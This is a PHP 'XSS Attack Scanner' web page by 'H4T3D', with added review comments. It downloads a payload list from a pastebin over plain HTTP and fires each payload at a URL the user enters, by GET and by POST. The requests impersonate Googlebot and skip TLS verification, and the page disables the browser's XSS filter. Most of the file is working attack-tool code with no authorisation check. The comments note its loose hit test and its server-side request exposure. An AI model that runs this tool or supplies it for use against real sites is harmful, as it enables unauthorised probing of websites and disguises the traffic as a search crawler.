<?php
###########################################################
#XSS Cross Site Scripting Automatic Attack Scanner By H4T3D
#image >> http://i.imgur.com/pYJJZFi.png
#Changing Name Wont Make You L33T -_-
##############################################################
// Remove PHP's execution time limit (0 = unlimited). The request that runs a
// scan therefore lasts as long as the payload loop further down keeps going;
// each HTTP probe carries its own 30-second cURL timeout.
set_time_limit(0);

// Tell browsers that still implement the legacy reflected-XSS filter to turn
// it off for this page. With the filter off, any request value written into
// the HTML below is rendered exactly as emitted, so output escaping is the
// only thing standing between form input and the operator's browser.
header('X-XSS-Protection: 0');
?>
<link href='https://fonts.googleapis.com/css?family=Orbitron' rel='stylesheet' type='text/css'>
<style type="text/css">
body {
background-color: #f0f0f2;
margin: 0;
padding: 0;
font-family: "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
}
h1{ font-family: 'Orbitron', sans-serif; color: #fff;}
div {
width: 600px;
margin: 5em auto;
padding: 50px;
//background-color: #fff;
background-color: black;
border-radius: 1em;
word-wrap: break-word;
}
a:link, a:visited {
color: #38488f;
text-decoration: none;
}
@media (max-width: 700px) {
body {
background-color: #fff;
}
div {
width: auto;
margin: 0 auto;
border-radius: 0;
padding: 1em;
}
}
</style>
<div>
<center>
<h1>XSS Scanner -H4T3D</h1>
<p>
<form action="" method="POST">
<input type="text" name ="q" placeholder="www.example.com/?q="/>
<input type="submit" name="key" value="SCAN"/>
</form>
</p>
<?php
if(isset($_POST['key']))
{
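// "q" is taken verbatim from the submitted form and is untrusted: it may be
// absent (only "key" was posted) or an array (q[]=...). Anything that is not a
// plain string is reduced to '' so later string handling never sees null/array.
$get=(isset($_POST["q"])&&is_string($_POST["q"]))?$_POST["q"]:'';
// $x is the name the rest of the script uses for the target URL prefix.
$x=$get;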
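/**
 * Probe one target with one payload and print the outcome as a line of HTML.
 *
 * The payload is URL-encoded and appended to the target in a GET request. If
 * that response body does not contain the marker "XSS", the same encoded
 * payload is sent to the target as a raw POST body (no field name).
 *
 * Limits a reader should know about:
 *  - The hit test is a case-sensitive substring match on "XSS". Any page that
 *    happens to contain those letters matches, whether or not the payload was
 *    reflected, so a "found" line is a hint to verify by hand, not a finding.
 *  - $x comes from the form and is fetched server-side. Requests are limited
 *    to http/https here, but the host is not restricted: internal addresses
 *    reachable from this server can still be requested. Access to the page
 *    itself has to be restricted by the deployment.
 *
 * @param string $x       Target URL prefix as typed by the operator (untrusted).
 * @param string $payload One line of the payload list.
 * @return bool True when either response body contained "XSS", false otherwise
 *              (including when the target was rejected or a request failed).
 */
function scan($x,$payload){
    // Print one result line and push it to the browser right away.
    // The PHP output buffer has to be flushed before the SAPI-level flush().
    $emit=function($html){
        echo $html;
        if(ob_get_level()>0){
            ob_flush();
        }
        flush();
    };
    // $x is echoed into an attribute and into text; escape for both.
    $esc=function($text){
        return htmlspecialchars($text,ENT_QUOTES|ENT_SUBSTITUTE,'UTF-8');
    };

    $x=trim((string)$x);
    $scheme=parse_url($x,PHP_URL_SCHEME);
    $schemeOk=($scheme===null)
        ||(is_string($scheme)&&in_array(strtolower($scheme),array('http','https'),true));
    if($x===''||!$schemeOk){
        // Rejects file://, javascript:, gopher:// and the like before anything
        // is fetched or turned into a clickable link.
        $emit("<font color='#f3172d'>\r\n[!] SKIPPED: only http:// and https:// targets are scanned </font></br>");
        return false;
    }
    // A scheme-less target ("www.example.com/?q=") is pinned to http:// so the
    // request and the reported link agree, instead of letting cURL guess.
    $target=($scheme===null)?'http://'.$x:$x;
    $encoded=urlencode((string)$payload);

    // One HTTP request; $postBody === null means GET. Returns the body or false.
    $request=function($url,$postBody=null){
        $ch=curl_init();
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch,CURLOPT_URL,$url);
        // Enforced by libcurl itself, independent of the scheme check above.
        curl_setopt($ch,CURLOPT_PROTOCOLS,CURLPROTO_HTTP|CURLPROTO_HTTPS);
        if($postBody!==null){
            curl_setopt($ch,CURLOPT_POST,1);
            curl_setopt($ch,CURLOPT_POSTFIELDS,$postBody);
        }
        // NOTE(review): certificate verification is off, so on https targets the
        // body that decides the result can be supplied by anyone on the path.
        curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);
        // The UA claims to be Googlebot. Sites can tell it apart from the real
        // crawler by reverse-DNS verification of the client address.
        curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
        curl_setopt($ch,CURLOPT_TIMEOUT,30);
        return curl_exec($ch);
    };
    // curl_exec() yields false on failure; only a real body can be a hit.
    $hit=function($body){
        return is_string($body)&&preg_match('/XSS/',$body)===1;
    };

    $getUrl=$target.$encoded;
    if($hit($request($getUrl))){
        // Report the URL that was actually requested, labelled as GET.
        $shown=$esc($getUrl);
        $emit("\r\n<font color='#00FF00'>[!] Method GET Url >> <a href='$shown' target=\"_blank\" rel=\"noopener noreferrer\">$shown</a></font></br>");
        return true;
    }

    if($hit($request($target,$encoded))){
        // The payload travelled in the request body, not the URL; show both.
        $shownTarget=$esc($target);
        $shownBody=$esc($encoded);
        $emit("\r\n<font color='#00FF00'>[!] Method POST Url >> <a href='$shownTarget' rel=\"noopener noreferrer\">$shownTarget</a> (body: $shownBody)</font></br>");
        return true;
    }

    $emit("<font color='#f3172d'>\r\n[!] NOT FOUND !!! </font></br>");
    return false;
}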
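// The payload list is downloaded on every scan from a third-party paste over
// plain HTTP, with no pinned local copy and no checksum. Whoever controls that
// paste, or the network path to it, decides what requests this server sends.
$homepage = file_get_contents('http://pastebin.com/raw.php?i=mJcw4XsU');
if ($homepage === false) {
    // Download failed: say so instead of looping over a bogus empty list.
    echo "<font color='#f3172d'>\r\n[!] Could not load the payload list </font></br>";
    $payloader = array();
} else {
    $payloader = explode("\n",$homepage);
}
foreach($payloader as $payload) {
    // trim() also removes the "\r" left behind by CRLF line endings.
    $payload = trim($payload);
    if ($payload === '') {
        // Blank lines (e.g. the one after a trailing newline) would only
        // re-request the bare target URL; skip them.
        continue;
    }
    scan($x,$payload);
}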
}//end of post key
?>
</div>